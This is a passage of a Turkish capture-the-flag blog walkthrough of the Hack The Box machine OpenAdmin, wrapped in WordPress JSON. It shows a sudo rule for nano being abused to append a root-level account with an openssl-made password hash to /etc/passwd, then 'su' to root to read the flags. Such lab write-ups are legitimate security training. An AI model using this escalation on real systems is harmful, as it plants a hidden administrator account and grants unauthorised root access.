Jul 17 21:21:40 2021 from 10.10.14.131\njoanna@openadmin:~$ \n<\/code><\/pre>\n
\u015eimdi ilgin\u00e7 bir \u015fey yapaca\u011f\u0131z. Ama \u00f6ncesinde flagimizi alal\u0131m.<\/p>\n
joanna@openadmin:~$ alias ls="ls -al"\njoanna@openadmin:~$ ls\ntotal 44\ndrwxr-x--- 6 joanna joanna 4096 Jul 17 23:47 .\ndrwxr-xr-x 4 root   root   4096 Nov 22  2019 ..\nlrwxrwxrwx 1 joanna joanna    9 Nov 22  2019 .bash_history -> \/dev\/null\n-rw-r--r-- 1 joanna joanna  220 Nov 22  2019 .bash_logout\n-rw-r--r-- 1 joanna joanna 3771 Nov 22  2019 .bashrc\ndrwx------ 2 joanna joanna 4096 Nov 22  2019 .cache\ndrwx------ 3 joanna joanna 4096 Nov 22  2019 .gnupg\ndrwxrwxr-x 3 joanna joanna 4096 Nov 22  2019 .local\n-rw------- 1 joanna joanna  170 Jul 17 23:47 nano.save\n-rw-r--r-- 1 joanna joanna  807 Nov 22  2019 .profile\ndrwx------ 2 joanna joanna 4096 Nov 23  2019 .ssh\n-rw-rw-r-- 1 joanna joanna   33 Nov 28  2019 user.txt\njoanna@openadmin:~$ cat user.txt \nc9**********************************\n<\/code><\/pre>\n
Kullan\u0131c\u0131n\u0131n a\u015fa\u011f\u0131da g\u00f6rd\u00fc\u011f\u00fcn\u00fcz gibi nano'yu root olarak \u00e7al\u0131\u015ft\u0131rabilme hakk\u0131 var.<\/p>\n
joanna@openadmin:\/home$ sudo -l\nMatching Defaults entries for joanna on openadmin:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser joanna may run the following commands on openadmin:\n    (ALL) NOPASSWD: \/bin\/nano \/opt\/priv\n<\/code><\/pre>\n
Yetki y\u00fckseltmeyi \u015fu \u015fekilde yapt\u0131m, root haklar\u0131nda nano arac\u0131yla \/opt\/priv'y a\u00e7t\u0131m. Ancak daha sonra nano'nun i\u00e7indeyken \/etc\/passwd dosyas\u0131n\u0131 a.mas\u0131n\u0131 istedim ve son sat\u0131r\u0131na a\u015fa\u011f\u0131daki eklemeyi yapt\u0131mm.<\/p>\n
joanna@openadmin:~$ sudo \/bin\/nano \/opt\/priv\njoanna@openadmin:~$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:100:102:systemd Network Management,,,:\/run\/systemd\/netif:\/usr\/sbin\/nologin\nsystemd-resolve:x:101:103:systemd Resolver,,,:\/run\/systemd\/resolve:\/usr\/sbin\/nologin\nsyslog:x:102:106::\/home\/syslog:\/usr\/sbin\/nologin\nmessagebus:x:103:107::\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:104:65534::\/nonexistent:\/usr\/sbin\/nologin\nlxd:x:105:65534::\/var\/lib\/lxd\/:\/bin\/false\nuuidd:x:106:110::\/run\/uuidd:\/usr\/sbin\/nologin\ndnsmasq:x:107:65534:dnsmasq,,,:\/var\/lib\/misc:\/usr\/sbin\/nologin\nlandscape:x:108:112::\/var\/lib\/landscape:\/usr\/sbin\/nologin\npollinate:x:109:1::\/var\/cache\/pollinate:\/bin\/false\nsshd:x:110:65534::\/run\/sshd:\/usr\/sbin\/nologin\njimmy:x:1000:1000:jimmy:\/home\/jimmy:\/bin\/bash\nmysql:x:111:114:MySQL Server,,,:\/nonexistent:\/bin\/false\njoanna:x:1001:1001:,,,:\/home\/joanna:\/bin\/bash\nuser:$1$7yTPISQ2$9DsJQreWfPBc7ZqTPHDms\/:0:0:root:\/root:\/bin\/bash\n<\/code><\/pre>\n
\u015eifre ks\u0131m\u0131n\u0131 olu\u015ftururken openssl'den yard\u0131m ald\u0131m.<\/p>\n
\u2500(root💀kali)-[~\/oscp\/htb\/OpenAdmin]\n\u2514\u2500# openssl passwd -1 \nPassword: \nVerifying - Password: \n$1$7yTPISQ2$9DsJQreWfPBc7ZqTPHDms\/\n<\/code><\/pre>\n
joanna@openadmin:~$ su user\nPassword: \nroot@openadmin:\/home\/joanna# id\nuid=0(root) gid=0(root) groups=0(root)\nroot@openadmin:\/home\/joanna# cd \/root\nroot@openadmin:~# ls\nroot.txt\nroot@openadmin:~# cat root.txt \n2f9******************************\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
Makine Ad\u0131 Seviye OS Logo OpenAdmin – HTB Kolay Linux Walkthrough Nmap taramas\u0131 ile ba\u015flayal\u0131m. [*] Scan: 9 Starting Nmap 7.91 ( https:\/\/nmap.org ) at…<\/p>\n
Devam\u0131n\u0131 okuOpenAdmin<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498],"tags":[],"class_list":["post-1375","post","type-post","status-publish","format-standard","hentry","category-walkthrough","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1375","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1375"}],"version-history":[{"count":4,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1375\/revisions"}],"predecessor-version":[{"id":1870,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1375\/revisions\/1870"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1375"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1375"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1375"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}